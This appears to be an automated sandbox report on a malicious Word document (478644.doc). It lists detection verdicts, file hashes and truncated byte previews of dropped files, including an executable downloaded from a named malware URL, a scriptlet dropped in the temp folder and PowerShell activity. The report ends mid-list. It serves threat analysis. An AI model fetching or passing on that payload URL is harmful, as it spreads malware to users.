                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                          Number of analysed new started processes analysed:43
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.expl.evad.winDOC@53/21@4/1
                                                          EGA Information:
                                                          • Successful, ratio: 25%
                                                          HDC Information:
                                                          • Successful, ratio: 0.9% (good quality ratio 0.8%)
                                                          • Quality average: 64.2%
                                                          • Quality standard deviation: 30.7%
                                                          HCA Information:
                                                          • Successful, ratio: 99%
                                                          • Number of executed functions: 0
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          • Found application associated with file extension: .doc
                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                          • Attach to Office via COM
                                                          • Active ActiveX Object
                                                          • Scroll down
                                                          • Close Viewer
                                                          Warnings:
                                                          Show All
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe
                                                          • TCP Packets have been reduced to 100
                                                          • Execution Graph export aborted for target okcff.exe, PID 2176 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 1308 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 2904 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          10:22:29API Interceptor95x Sleep call for process: powershell.exe modified
                                                          10:22:35API Interceptor722x Sleep call for process: okcff.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          No context

                                                          Domains

                                                          No context

                                                          ASN

                                                          No context

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exe
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:downloaded
                                                          Size (bytes):194560
                                                          Entropy (8bit):4.668942832070624
                                                          Encrypted:false
                                                          SSDEEP:1536:QLwio+gEPHeB9PYR0uQ7nXhMM70iOVcse5m6h:rt+gIHeB9PYRnQL6S5
                                                          MD5:E9416A322E9A796D45588BC4FB04CD45
                                                          SHA1:8D261D205C8D34A4A24B713DD6B9585647B8BDEB
                                                          SHA-256:F2DA177AFF59093ABE1D3BC7C1A769BE2701784036C398900A43725D83C9E9A9
                                                          SHA-512:9A1FF2B39DFD93D3B6EAED4685876E8BF877BD1695FDC7095B74ABEADAFBAEE785815FEB75585D31299B3D0A18B5E88890DA942D65F407171C28CAF66655C5AE
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          IE Cache URL:http://mitmar-pl.com/okcff.exe
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Y................0..T..........Ns... ........@.. .......................@............@..................................s..K.......X.................... ....................................................... ............... ..H............text...TS... ...T.................. ..`.rsrc...X............V..............@..@.reloc....... ......................@..B................0s......H........B.../..........Hr...............................................0...........r...p(....(.....(......(.....*..0..Q....... ......$.8......$.E........................S...............c...........^...........7...>...2...................(...................[...........m...8.....8M... ....~_...:....& ....8......(.E........q.......^...8............io....8......./(....:8... ....8......,.....(....(.....* ....~h...9....& ....8...../(....t......8....(.....*(...... ....~....9]...&
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\570DA74A.wmf
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:Targa image data - Map - RLE 1569 x 65536 x 0 +2 "\005"
                                                          Category:dropped
                                                          Size (bytes):3712
                                                          Entropy (8bit):5.036435545575714
                                                          Encrypted:false
                                                          SSDEEP:96:Gk7Hgwj+mbYf3LSrhlOs0f5aSdHn63Dx3:Gk7Awam8fI4s0f5ap3
                                                          MD5:F238B72FF240B9EA28769FFFB0C11843
                                                          SHA1:54EDB9197B4A4C9C3CFFF894A83174DD17DDA9D2
                                                          SHA-256:A37AE38F17314E0B3C0967F597285E9EC9CA175B6DC223ECF76BC6CE79586E05
                                                          SHA-512:4AA9A9EF5432C866F996679D58358CC02DF2CF07346AA030E643EB70258957058EBE10E0EF7CA7E6B41DECE1C99539B738864A24D9DD118E60206263C17620DB
                                                          Malicious:false
                                                          Preview: ......@.....!.....................5...........................Segoe UI....C.-.....@..........R....-...........................A..... . ..... . ...:.(... ...@.............................................................................................................................................................................................................................................................................................?.........!...A.F.f. . ..... . ...:.(... ... ................................................................................................................................................................................................................................................................................................................................G .>..:..9..8..8..8..9..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:.i2........K..S(.O$.N!.N!.N!.N!.N".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".N".M".M".O$.S).O".......l
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7CE2D32D.png
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:370 sysV pure executable
                                                          Category:dropped
                                                          Size (bytes):262160
                                                          Entropy (8bit):0.05136362991589137
                                                          Encrypted:false
                                                          SSDEEP:48:YpVMBmYIjDBgdEJdOcfd/Xdd/u9N7zGkqfoQ6eI:Yp/zb+HGffFE
                                                          MD5:A8A92E1C3D97E40596840C5045F94F67
                                                          SHA1:B2B4FB6D579C92F649582F63CC89D7B190AD8025
                                                          SHA-256:2C26843633ABB38F10B1D93AF2D96AC746C7C060EF69E06B113707F3F7FE8E74
                                                          SHA-512:048BAC628842FFEB7A9D218F3E680D38267A3FADA8DFED6DE1C60FA4F7D3BF7B8FA2681D0393D6A7520AE1F594E9649B470550B4344082B3FCDA62AF6A82E112
                                                          Malicious:false
                                                          Preview: X.........E.....W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.W.b.e.m.;.C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l.\.v.1...0.\...P.A.T.H.E.X.T.=...C.O.M.;...E.X.E.;...B.A.T.;...C.M.D.;...V.B.S.;...V.B.E.;...J.S.;...J.S.E.;...W.S.F.;...W.S.H.;...M.S.C...P.R.O.C.E.S.S.O.R._.A.R.C.H.I.T.E.C.T.U.R.E.=.A.M.D.6.4...P.R.O.C.E.S.S.O.R._.I.D.E.N.T.I.F.I.E.R.=.I.n.t.e.l.6.4. .F.a.m.i.l.y. .6. .M.o.d.e.l. .8.5. .S.t.e.p.p.i.n.g. .7.,. .G.e.n.u.i.n.e.I.n.t.e.l...P.R.O.C.E.S.S.O.R._.L.E.V.E.L.=.6...P.R.O.C.E.S.S.O.R._.R.E.V.I.S.I.O.N.=.5.5.0.7...P.r.o.g.r.a.m.D.a.t.a.=.C.:.\.P.r.o.g.r.a.m.D.a.t.a...P.r.o.g.r.a.m.F.i.l.e.s.=.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s...P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).=.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...P.r.o.g.r.a.m.W.6.4.3.2.=.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s...P.S.M.o.d.u.l.e.P.a.t.h.=.C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l.\.v.1...0.\.M.o.d.u.l.e.s.\.;.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.u.t.o.I.
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                          Category:dropped
                                                          Size (bytes):212992
                                                          Entropy (8bit):4.7464056683239715
                                                          Encrypted:false
                                                          SSDEEP:3072:QbzakaBa9aRaOa2TF7sbzakaBa9aRaOa2TF7:KzakaBa9aRaOa2TozakaBa9aRaOa2T
                                                          MD5:D7EF29F80097BDF434F81F076289F2D4
                                                          SHA1:231DCAD0641F6DDF6D28A89D9AAF4102B261E693
                                                          SHA-256:8451756E2D56C1A430FCABA7DB51CF20ADEA6B83DB858E18AF6ABE4441238EA9
                                                          SHA-512:0454576AB79FAC0588046D19ACD5C562B7295C34C98C579E62D3667AADF72F6A31A5C68EFA736DBCDEE0A1F5FC30468CDFD5A6A25C00900FB22D7AF7D6D36DD2
                                                          Malicious:false
                                                          Preview: ......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4FAE5255-02F9-464D-A70F-CC3F2B77B94E}.tmp
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1536
                                                          Entropy (8bit):1.3573187972516119
                                                          Encrypted:false
                                                          SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbG:IiiiiiiiiifdLloZQc8++lsJe1Mzl/n
                                                          MD5:21C2AF2BB9957FFECAD589E76FF8BA89
                                                          SHA1:08DDE72BB9349A555263E85CCDC477DB202E85FE
                                                          SHA-256:79586CFF1216985B54C69EC7D60FEB94DE375C824B633C32151F883FC4822991
                                                          SHA-512:CADC111BE5DA804F427AB8B4CF9652F09223A9BD2B220376D1E88CCD78A37A159C6B79A2DEF38E5D0D0B25D7402FA5B1721CEFECF35C6EF51DA46290A2C06D1F
                                                          Malicious:false
                                                          Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5349C035-C6A0-4C16-B632-E1A36FB414FC}.tmp
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1024
                                                          Entropy (8bit):0.05390218305374581
                                                          Encrypted:false
                                                          SSDEEP:3:ol3lYdn:4Wn
                                                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                          Malicious:false
                                                          Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8C959E4C-92E1-4241-AA94-1568DABC6F24}.tmp
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):44016
                                                          Entropy (8bit):2.8832027230024
                                                          Encrypted:false
                                                          SSDEEP:768:IT/3ViFs0Dqeb4Zep84JtueJvCI19rIwzWSgUg4P58F:AFia0Dqeb0nstw29rVzWSgm58F
                                                          MD5:D320E2636A4FE368F1DD1721A88C0B72
                                                          SHA1:6DE8E522B7C191677F9A8668BFF895F3E7E0FB64
                                                          SHA-256:C73D18662DFD69AABA06F46A599560EC230124395B678230C4F0F8DFE83CA475
                                                          SHA-512:9B27E59DE735F81C7766AC2439057D6433D424C7CFF333274DE3736CCEA492BCFF08A6D0D3183E480CCB78040993DC00A174E3D5C444E63AD1E9FDEA28D501EB
                                                          Malicious:false
                                                          Preview: c.0.5.=......... .P.a.c.k.a.g.e.E.M.B.E.D.W.o.r.d...D.o.c.u.m.e.n.t...8.........=....... .\.a. .W.o.r.d...D.o.c.u.m.e.n.t...8. .".%.T.M.P.%.\.\.a.b.d.t.f.h.g.h.g.e.g.h.D.p.~...S.C.T.". .".e.w.:.{.0.0.0.0.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.0.0.0.0.0.0.0.0.}.".L.I.N.K.8.7.e.9.4.e.f.e.c.e.9.7.0.2.e.d.4.1.f.4.5.9.e.b.e.d.9.e.f.e.2.5.8.9.5.0.4.e.4.7.0.......................................................................................................................................................................H...R...X............................................................................................................................................................................................................................................................................................................................................................................................CJ..OJ..QJ..^J..aJ.....j....CJ..OJ..QJ..U..^J..aJ.. .ja.e...CJ..OJ..QJ..U..^J..aJ.
                                                          C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):96978
                                                          Entropy (8bit):4.476034550957548
                                                          Encrypted:false
                                                          SSDEEP:768:+abzakaBa9aRaOa2O2jOLWRoNVYwUn7ZwPW1DGJ:+abzakaBa9aRaOa2TENa7A
                                                          MD5:30DD770655427043A65B4CA45F7443C6
                                                          SHA1:3BBC7640A0D21F941D342532405FE6B62BC1C423
                                                          SHA-256:C48F7949E36EA00828F752C9A5A2BAA48FA6F867BA9013025B6D6CB858F31768
                                                          SHA-512:188F28CC8E3FB2C14F34360BDD0CD137B17162DA59017A9C42E9559837ECBE56BE290A93B715E3F2F3F1CF7CC28343CDC497E6EA0303275530D450C3204B63BE
                                                          Malicious:true
                                                          Preview: .............................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT:Zone.Identifier
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:gAWY3n:qY3n
                                                          MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                          SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                          SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                          SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                          Malicious:false
                                                          Preview: [ZoneTransfer]..ZoneId=3..
                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\478644.LNK
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:56 2021, mtime=Mon Aug 30 20:08:56 2021, atime=Fri Jan 14 17:22:23 2022, length=392070, window=hide
                                                          Category:dropped
                                                          Size (bytes):992
                                                          Entropy (8bit):4.516683865071603
                                                          Encrypted:false
                                                          SSDEEP:12:8Cr1I0gXg/XAlCPCHaXjByB/AVtX+WLUyVNicvbMK5DtZ3YilMMEpxRljKPtt6Tg:8nk/XTTc+bRUM0ef5Dv3qwtiR7m
                                                          MD5:0F74FC3AD8670059320D5A7767BB0A3E
                                                          SHA1:6305BC2235CB1924EAB45008C8B4FD0BB9B6CFF9
                                                          SHA-256:132354D2946AB264EFA224DF2AE58E9BA7FB67122F3672BC8F6A564CBF8C609A
                                                          SHA-512:207815791EB8572911BF33A0E4B5E2AE24A53D8514210F170BBF345D57847D4A4BEA7924B2ABFE92A76631763A0D1A34EE980A29A9ADEA4B14B3484F16D66B89
                                                          Malicious:false
                                                          Preview: L..................F.... ....y>....y>....^.s................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S..*...&=....U...............A.l.b.u.s.....z.1......S ...Desktop.d......QK.X.S .*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....\.2......T. .478644.doc..B.......S...S..*.........................4.7.8.6.4.4...d.o.c.......t...............-...8...[............?J......C:\Users\..#...................\\506013\Users.user\Desktop\478644.doc.!.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.4.7.8.6.4.4...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......506013..........D_....3N...W...9..g............[D_....3N...W...9..g............[....
                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):63
                                                          Entropy (8bit):4.548497884319839
                                                          Encrypted:false
                                                          SSDEEP:3:bDuMJlSLjomX1RuT3Ljov:bCLjC7jy
                                                          MD5:0BF65FC4D2E1FE20737B46427E7DB0D2
                                                          SHA1:F210ABEDA65F65C2DE79F07D3049C4C5DB489CF6
                                                          SHA-256:612DDD432589CB1586BEE2B9173D880A3E1FDBA888D40DB2D8D8F6AE9A96E186
                                                          SHA-512:0D5CC6582ECCF2E8CC0E1B19CBEB72AC621306D1DABB3BCD89B09BBE309D00788EE3858E9607FBA56456EC354C3B0D9E87BC10F94B36994F61ECC3ED546B6743
                                                          Malicious:false
                                                          Preview: [folders]..Templates.LNK=0..478644.LNK=0..[doc]..478644.LNK=0..
                                                          C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):162
                                                          Entropy (8bit):2.5038355507075254
                                                          Encrypted:false
                                                          SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                          MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                          SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                          SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                          SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                          Malicious:false
                                                          Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                          C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):2
                                                          Entropy (8bit):1.0
                                                          Encrypted:false
                                                          SSDEEP:3:Qn:Qn
                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                          Malicious:false
                                                          Preview: ..
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.582206362297639
                                                          Encrypted:false
                                                          SSDEEP:96:chQCQMqlqvsqvJCwoiiz8hQCQMqlqvsEHyqvJCworwizKAYuHXiKXX2lUV8iA2:cWUoiiz8WAHnorwizKoiKXXKiA2
                                                          MD5:484FCA57FA5B39E59B75DE31E510D704
                                                          SHA1:A9A4B2579158D1C71122D7C1418C78B497B41570
                                                          SHA-256:80DDFCC0C707A6DF30F4F380C75C16A941158AA0BAA660CAEB068C3234F718FD
                                                          SHA-512:6286D09A5E01E54B7FA57724E4CCC73B36C3E179986A61055CC0A4B77CEEC144BC44545EEC8B7AF68F089721780242F0C7CEB0A865A3FE9E397DE034D96B6C45
                                                          Malicious:false
                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms2E (copy)
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.582206362297639
                                                          Encrypted:false
                                                          SSDEEP:96:chQCQMqlqvsqvJCwoiiz8hQCQMqlqvsEHyqvJCworwizKAYuHXiKXX2lUV8iA2:cWUoiiz8WAHnorwizKoiKXXKiA2
                                                          MD5:484FCA57FA5B39E59B75DE31E510D704
                                                          SHA1:A9A4B2579158D1C71122D7C1418C78B497B41570
                                                          SHA-256:80DDFCC0C707A6DF30F4F380C75C16A941158AA0BAA660CAEB068C3234F718FD
                                                          SHA-512:6286D09A5E01E54B7FA57724E4CCC73B36C3E179986A61055CC0A4B77CEEC144BC44545EEC8B7AF68F089721780242F0C7CEB0A865A3FE9E397DE034D96B6C45
                                                          Malicious:false
                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msio (copy)
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.582206362297639
                                                          Encrypted:false
                                                          SSDEEP:96:chQCQMqlqvsqvJCwoiiz8hQCQMqlqvsEHyqvJCworwizKAYuHXiKXX2lUV8iA2:cWUoiiz8WAHnorwizKoiKXXKiA2
                                                          MD5:484FCA57FA5B39E59B75DE31E510D704
                                                          SHA1:A9A4B2579158D1C71122D7C1418C78B497B41570
                                                          SHA-256:80DDFCC0C707A6DF30F4F380C75C16A941158AA0BAA660CAEB068C3234F718FD
                                                          SHA-512:6286D09A5E01E54B7FA57724E4CCC73B36C3E179986A61055CC0A4B77CEEC144BC44545EEC8B7AF68F089721780242F0C7CEB0A865A3FE9E397DE034D96B6C45
                                                          Malicious:false
                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FQ6733LFPKS74NKOVPFM.temp
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.582206362297639
                                                          Encrypted:false
                                                          SSDEEP:96:chQCQMqlqvsqvJCwoiiz8hQCQMqlqvsEHyqvJCworwizKAYuHXiKXX2lUV8iA2:cWUoiiz8WAHnorwizKoiKXXKiA2
                                                          MD5:484FCA57FA5B39E59B75DE31E510D704
                                                          SHA1:A9A4B2579158D1C71122D7C1418C78B497B41570
                                                          SHA-256:80DDFCC0C707A6DF30F4F380C75C16A941158AA0BAA660CAEB068C3234F718FD
                                                          SHA-512:6286D09A5E01E54B7FA57724E4CCC73B36C3E179986A61055CC0A4B77CEEC144BC44545EEC8B7AF68F089721780242F0C7CEB0A865A3FE9E397DE034D96B6C45
                                                          Malicious:false
                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O2GRPLQKV4A3U7C26MID.temp
